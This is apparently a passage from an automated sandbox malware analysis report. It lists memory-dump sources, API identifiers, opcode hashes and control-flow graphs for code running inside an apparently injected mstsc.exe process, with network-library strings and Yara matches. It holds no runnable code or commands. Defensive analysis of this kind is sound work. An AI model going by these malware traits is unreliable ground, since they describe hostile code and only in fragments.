                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.0000000002330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_21c0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                                        • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                                        • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000021C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.0000000002330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_21c0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000021C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.0000000002330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_21c0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000021C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.0000000002330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_21c0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                                        • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                                                        • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                                        • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000021C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.0000000002330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_21c0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000021C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.0000000002330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_21c0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000021C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.0000000002330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_21c0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000021C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.0000000002330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_21c0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000021C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.0000000002330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_21c0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000021C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.0000000002330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_21c0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000021C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.0000000002330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_21c0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000021C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.0000000002330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_21c0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000021C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.0000000002330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_21c0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 135 99050-99092 call 9bd10 138 99098-990e8 call 9bde0 call 8acf0 call 94e50 135->138 139 9916c-99172 135->139 146 990f0-99101 Sleep 138->146 147 99103-99109 146->147 148 99166-9916a 146->148 149 9910b-99131 call 98c70 147->149 150 99133-99153 147->150 148->139 148->146 151 99159-9915c 149->151 150->151 152 99154 call 98e80 150->152 151->148 152->151
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 000990F8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                                                                                        • Opcode ID: 1a71e6dc4dff4f472559d6feda0db4d663c70a74246b6585649c3cc6ab04cd34
                                                                                                                                                                                        • Instruction ID: 0fb9404940b6011d39e0c2eabc81020df5ec2be6c65b3f89133829522f37a466
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a71e6dc4dff4f472559d6feda0db4d663c70a74246b6585649c3cc6ab04cd34
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6431A4B2500745BBCB24DF68C885FA7B7F8FB48B01F10811DF62A5B246DA30B650DBA4

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 155 99046-99092 call 9bd10 159 99098-990e8 call 9bde0 call 8acf0 call 94e50 155->159 160 9916c-99172 155->160 167 990f0-99101 Sleep 159->167 168 99103-99109 167->168 169 99166-9916a 167->169 170 9910b-99131 call 98c70 168->170 171 99133-99153 168->171 169->160 169->167 172 99159-9915c 170->172 171->172 173 99154 call 98e80 171->173 172->169 173->172
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 000990F8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                                                                                        • Opcode ID: 99e6661cf24a82a75d117501f3cc5044aecd9bd8c2b3ba7286cd937b3fb5c686
                                                                                                                                                                                        • Instruction ID: e9091042877c5abd072e7952921c959640f950b5b5f00492e43bbde522864edc
                                                                                                                                                                                        • Opcode Fuzzy Hash: 99e6661cf24a82a75d117501f3cc5044aecd9bd8c2b3ba7286cd937b3fb5c686
                                                                                                                                                                                        • Instruction Fuzzy Hash: C621A2B1900345AFCB24DF68C885FA7B7F8FB48B00F10801DFA295B246DB70A650DBA5

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 176 99173-99174 177 99132-99153 176->177 178 99176-991a8 call 94e50 176->178 180 99159-9915c 177->180 181 99154 call 98e80 177->181 184 991aa-991c6 call 9f242 CreateThread 178->184 185 991c7-991cc 178->185 183 99166-9916a 180->183 181->180 186 9916c-99172 183->186 187 990f0-99101 Sleep 183->187 187->183 188 99103-99109 187->188 190 9910b-99131 call 98c70 188->190 191 99133-99153 188->191 190->180 191->180 193 99154 call 98e80 191->193 193->180
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008F050,?,?,00000000), ref: 000991BC
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
